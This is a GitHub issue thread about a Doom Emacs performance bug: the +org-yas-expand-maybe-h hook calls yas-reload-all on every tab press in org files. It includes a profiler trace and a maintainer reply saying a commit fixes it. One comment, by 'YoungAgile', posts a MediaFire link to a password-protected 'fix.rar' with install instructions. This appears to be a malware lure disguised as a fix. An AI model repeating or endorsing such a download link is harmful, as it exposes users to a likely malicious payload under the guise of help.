### ISSUE TITLE
Performance issue with `+org-yas-expand-maybe-h`

### ISSUE THREAD

**Issue by gpanago** [doomemacs/doomemacs#8025]
### I confirm that...

- [X] I have searched the [issue tracker](https://github.com/doomemacs/doomemacs/issues), [documentation](https://docs.doomemacs.org), [FAQ](https://docs.doomemacs.org/-/faq), [Discourse](https://discourse.doomemacs.org), and [Google](https://google.com), in case this issue has already been reported/resolved.
- [X] I have read "[How to Debug Issues](https://doomemacs.org/d/how2debug)", and will use it to provide as much information about this issue as possible.
- [X] The issue can be reproduced on the **latest** available commit of Doom.
- [X] The issue can be reproduced on a stable release of Emacs, such as 27, 28, or 29. *(Unstable versions end in .50, .60, or .9x)*

### Expected behavior

Ideally, adding `+org-yas-expand-maybe-h` to `org-tab-first-hook` would not impact performance.

### Current behavior

When viewing any Doom Doc, pressing tab on any heading results in a noticeable waiting time (~1 to 2 seconds) until the heading is expanded. The code `(remove-hook 'org-tab-first-hook #'+org-yas-expand-maybe-h)` fixes the issue. From the CPU usage, it seems that on every tab, the function `yas-reload-all` is called:

```
                                                                       1065  97% - command-execute
                                                                       1065  97%  - funcall-interactively
                                                                       1061  97%   - org-cycle
                                                                       1055  96%    - +org-yas-expand-maybe-h
                                                                       1055  96%     - if
                                                                       1055  96%      - progn
                                                                       1055  96%       - and
                                                                       1055  96%        - let
                                                                       1055  96%         - cond
                                                                       1055  96%          - and
                                                                       1055  96%           - or
                                                                       1055  96%            - progn
                                                                       1055  96%             - yas-reload-all
                                                                       1055  96%              + catch
                                                                          6   0%    + org-cycle-internal-local
                                                                          3   0%   + doom/toggle-profiler
                                                                         14   1% + timer-event-handler
                                                                          9   0% + redisplay_internal (C function)
                                                                          0   0% + ...
```

### Steps to reproduce

1. Open any Doom Doc.
2. Press tab on any heading.

### System Information

https://pastebin.com/MNdZFZFS

**Comment by YoungAgile** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by hlissner** [comment]
As of 67a516c this should be resolved. Let me know if that isn't the case and I'll reopen it. Thanks for bringing it to my attention!
